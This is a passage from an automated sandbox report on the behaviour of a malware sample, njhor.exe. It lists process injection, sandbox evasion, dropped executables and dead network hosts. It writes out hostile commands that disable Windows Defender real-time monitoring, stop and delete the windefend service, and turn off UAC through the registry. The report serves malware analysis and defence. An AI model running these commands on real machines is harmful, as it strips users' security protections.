file	C:\Users\test22\AppData\Local\Temp\dllhost.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (1 event)

cmdline

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Drops a binary and executes it (1 event)

file	C:\Users\test22\AppData\Local\Temp\dllhost.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\dllhost.exe

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 3, 2024, 7:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW April 3, 2024, 7:19 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Uses Windows utilities for basic Windows functionality (4 events)

cmdline	reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmdline	sc delete windefend
cmdline	sc stop windefend
cmdline	sc query windefend

Attempts to stop active services (1 event)

Time & API	Arguments	Status	Return	Repeated
ControlService April 3, 2024, 7:19 a.m.	service_handle: 0x0042b730 service_name: windefend control_code: 1		0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation April 3, 2024, 7:19 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (1 event)

description

njhor.exe tried to sleep 2728177 seconds, actually delayed analysis time by 2728177 seconds

Potential code injection by writing to the memory of another process (50 out of 488 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2552 injected into non-child 2552
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&((* base_address: 0x00402060 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402074 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x00402084 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402098 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x004020a4 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&( (* base_address: 0x004020b8 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x004020cc process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x004020dc process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x004020f0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x004020fc process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x004021dc process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x004021f0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x00402204 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x00402218 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x0040222c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x0040223c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402248 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: R8&(( base_address: 0x00402254 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x0040226c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: ^8& (#($ base_address: 0x0040227c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402294 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 0!8& base_address: 0x004022a4 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: >8& base_address: 0x004022d4 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&(&('* base_address: 0x004022e4 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ ( * base_address: 0x004022f8 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: V8&þ þ ( base_address: 0x0040230c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402324 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402330 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x0040233c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ base_address: 0x00402350 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ ( * base_address: 0x00402364 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x00402378 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x0040238c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x0040239c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 8&~ : base_address: 0x004023d0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&(ª( * base_address: 0x004023f8 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x0040240c process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402418 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&(2(5* base_address: 0x00402444 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 0{ 8& base_address: 0x00402458 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 0³8& base_address: 0x00402ee0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402fa0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402fb0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402fbc process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x00402fc8 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ (" * base_address: 0x00402fdc process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402ff0 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: V8&þ þ o$ base_address: 0x00403000 process_identifier: 2552 process_handle: 0x000001d8	1	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: V8&þ þ o% base_address: 0x00403018 process_identifier: 2552 process_handle: 0x000001d8	1	1	0

The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Disables Windows Security features (1 event)

description

attempts to disable user access control

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA

Executed a process and injected code into it, probably while unpacking (50 out of 516 events)

Time & API	Arguments	Status	Return
NtResumeThread April 3, 2024, 7:19 a.m.	thread_handle: 0x000000d0 suspend_count: 1 process_identifier: 2552	1	0
NtResumeThread April 3, 2024, 7:19 a.m.	thread_handle: 0x00000160 suspend_count: 1 process_identifier: 2552	1	0
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&((* base_address: 0x00402060 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402074 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x00402084 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402098 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x004020a4 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&( (* base_address: 0x004020b8 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x004020cc process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x004020dc process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x004020f0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x004020fc process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x004021dc process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x004021f0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x00402204 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&~o * base_address: 0x00402218 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x0040222c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x0040223c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402248 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: R8&(( base_address: 0x00402254 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x0040226c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: ^8& (#($ base_address: 0x0040227c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402294 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 0!8& base_address: 0x004022a4 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: >8& base_address: 0x004022d4 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&(&('* base_address: 0x004022e4 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ ( * base_address: 0x004022f8 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: V8&þ þ ( base_address: 0x0040230c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402324 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402330 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x0040233c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ base_address: 0x00402350 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ ( * base_address: 0x00402364 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x00402378 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x0040238c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x0040239c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 8&~ : base_address: 0x004023d0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&(ª( * base_address: 0x004023f8 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x0040240c process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402418 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: N8&(2(5* base_address: 0x00402444 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 0{ 8& base_address: 0x00402458 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: 0³8& base_address: 0x00402ee0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402fa0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402fb0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: &8& base_address: 0x00402fbc process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: F8&þ ( * base_address: 0x00402fc8 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: J8&þ (" * base_address: 0x00402fdc process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: :8& base_address: 0x00402ff0 process_identifier: 2552 process_handle: 0x000001d8	1	1
WriteProcessMemory April 3, 2024, 7:19 a.m.	buffer: V8&þ þ o$ base_address: 0x00403000 process_identifier: 2552 process_handle: 0x000001d8	1	1

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (26 events)

dead_host	192.168.56.101:49191
dead_host	3.67.62.142:13052
dead_host	192.168.56.101:49192
dead_host	192.168.56.101:49196
dead_host	192.168.56.101:49176
dead_host	192.168.56.101:49184
dead_host	192.168.56.101:49180
dead_host	192.168.56.101:49193
dead_host	192.168.56.101:49188
dead_host	192.168.56.101:49197
dead_host	192.168.56.101:49177
dead_host	192.168.56.101:49185
dead_host	192.168.56.101:49181
dead_host	192.168.56.101:49194
dead_host	192.168.56.101:49189
dead_host	192.168.56.101:49198
dead_host	192.168.56.101:49178
dead_host	192.168.56.101:49186
dead_host	192.168.56.101:49182
dead_host	192.168.56.101:49195
dead_host	3.127.181.115:13052
dead_host	192.168.56.101:49190
dead_host	192.168.56.101:49199
dead_host	192.168.56.101:49179
dead_host	192.168.56.101:49187
dead_host	192.168.56.101:49183

njhor.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All